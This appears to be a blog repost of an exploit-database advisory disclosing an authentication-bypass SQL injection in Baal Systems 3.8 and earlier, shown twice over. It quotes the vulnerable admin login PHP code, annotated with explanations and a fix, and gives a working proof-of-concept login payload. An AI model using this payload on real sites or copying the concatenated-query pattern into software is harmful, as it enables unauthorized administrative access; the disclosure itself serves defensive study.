Kamis, 04 Maret 2010

Baal Systems <= 3.8 (Auth Bypass) SQL Injection Vulnerability

# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0 _ __ __ __ 1
# 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
# 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
# 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
# 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
# 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
# 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
# 1 \ \____/ >> Exploit database separated by exploit 0
# 0 \/___/ type (local, remote, DoS, etc.) 1
# 1 1
# 0 [+] Site : Inj3ct0r.com 0
# 1 [+] Support e-mail : submit[at]inj3ct0r.com 1
# 0 0
# 1 ###################################### 1
# 0 I'm cr4wl3r member from Inj3ct0r Team 1
# 1 ###################################### 0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#[+] Discovered By: cr4wl3r

[+] Vuln Code :

[adminlogin.php]

// adminlogin.php (excerpt as quoted in the advisory): processes the admin login form POST.
// NOTE(review): common.php is not shown; presumably it defines $tableprefix, db_query(),
// db_num_rows() and db_fetch_array() and starts the session — confirm against the full file.
include("common.php");
// Only the password field is checked for presence; the username is used as-is below.
if (!empty($_POST['password'])) {
// Raw request values, with no validation or escaping before they reach the query text.
$username = $_POST['username'];
$password = $_POST['password'];

// Both user-controlled values are concatenated straight into the SQL string, so a quote
// character in either field changes the structure of the query rather than its data
// (this is the authentication bypass the advisory reports). The submitted password is
// also compared verbatim inside SQL, not against a hash in PHP.
// Mitigation: bind $username as a query parameter (or escape it with the driver's
// escaping function), fetch the stored credential by username only, and verify it with
// password_verify() in PHP.
$query = "select * from {$tableprefix}tbluser where username='" . $username . "' and password='" . $password . "' and userrole='admin';";
$result1 = db_query($query);
$rows = db_num_rows($result1);
$row = db_fetch_array($result1);
// Any non-zero row count is treated as a successful admin login.
if ($rows != 0) {
// session_is_registered()/session_register() were deprecated in PHP 5.3 and removed in 5.4;
// both branches below set the same session keys and differ only in this legacy call.
if (session_is_registered("whossession")) {
$_SESSION['who'] = "admin";
$_SESSION['userrole'] = "admin";
$_SESSION['username'] = $username;
$_SESSION['usernum'] = $row["userid"];
// No exit() follows the redirect header in this excerpt, so whatever the full file
// places after the if/else still executes for the redirected request.
header("location:admin.php");
} else {
session_register("whossession");
$_SESSION['who'] = "admin";
$_SESSION['userrole'] = "admin";
$_SESSION['username'] = $username;
$_SESSION['usernum'] = $row["userid"];
// Same as above: redirect without exit().
header("location:admin.php");
}
} else {
// Failed login: send the browser back to the form with an error flag.
header("location:adminlogin.php?error=yes");
}
} else {
// The excerpt ends here; the body of this else branch and its closing brace are not shown.

?>

[+] PoC :

[BaalSystems_path]/adminlogin.php


username: ' or' 1=1
Password: ' or' 1=1

[+] Baal Systems <= 3.8 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by cr4wl3r

[+] Vuln Code :

[adminlogin.php]

// adminlogin.php (excerpt as quoted in the advisory): processes the admin login form POST.
// NOTE(review): common.php is not shown; presumably it defines $tableprefix, db_query(),
// db_num_rows() and db_fetch_array() and starts the session — confirm against the full file.
include("common.php");
// Only the password field is checked for presence; the username is used as-is below.
if (!empty($_POST['password'])) {
// Raw request values, with no validation or escaping before they reach the query text.
$username = $_POST['username'];
$password = $_POST['password'];

// Both user-controlled values are concatenated straight into the SQL string, so a quote
// character in either field changes the structure of the query rather than its data
// (this is the authentication bypass the advisory reports). The submitted password is
// also compared verbatim inside SQL, not against a hash in PHP.
// Mitigation: bind $username as a query parameter (or escape it with the driver's
// escaping function), fetch the stored credential by username only, and verify it with
// password_verify() in PHP.
$query = "select * from {$tableprefix}tbluser where username='" . $username . "' and password='" . $password . "' and userrole='admin';";
$result1 = db_query($query);
$rows = db_num_rows($result1);
$row = db_fetch_array($result1);
// Any non-zero row count is treated as a successful admin login.
if ($rows != 0) {
// session_is_registered()/session_register() were deprecated in PHP 5.3 and removed in 5.4;
// both branches below set the same session keys and differ only in this legacy call.
if (session_is_registered("whossession")) {
$_SESSION['who'] = "admin";
$_SESSION['userrole'] = "admin";
$_SESSION['username'] = $username;
$_SESSION['usernum'] = $row["userid"];
// No exit() follows the redirect header in this excerpt, so whatever the full file
// places after the if/else still executes for the redirected request.
header("location:admin.php");
} else {
session_register("whossession");
$_SESSION['who'] = "admin";
$_SESSION['userrole'] = "admin";
$_SESSION['username'] = $username;
$_SESSION['usernum'] = $row["userid"];
// Same as above: redirect without exit().
header("location:admin.php");
}
} else {
// Failed login: send the browser back to the form with an error flag.
header("location:adminlogin.php?error=yes");
}
} else {
// The excerpt ends here; the body of this else branch and its closing brace are not shown.

?>

[+] PoC :

[BaalSystems_path]/adminlogin.php


username: ' or' 1=1
Password: ' or' 1=1
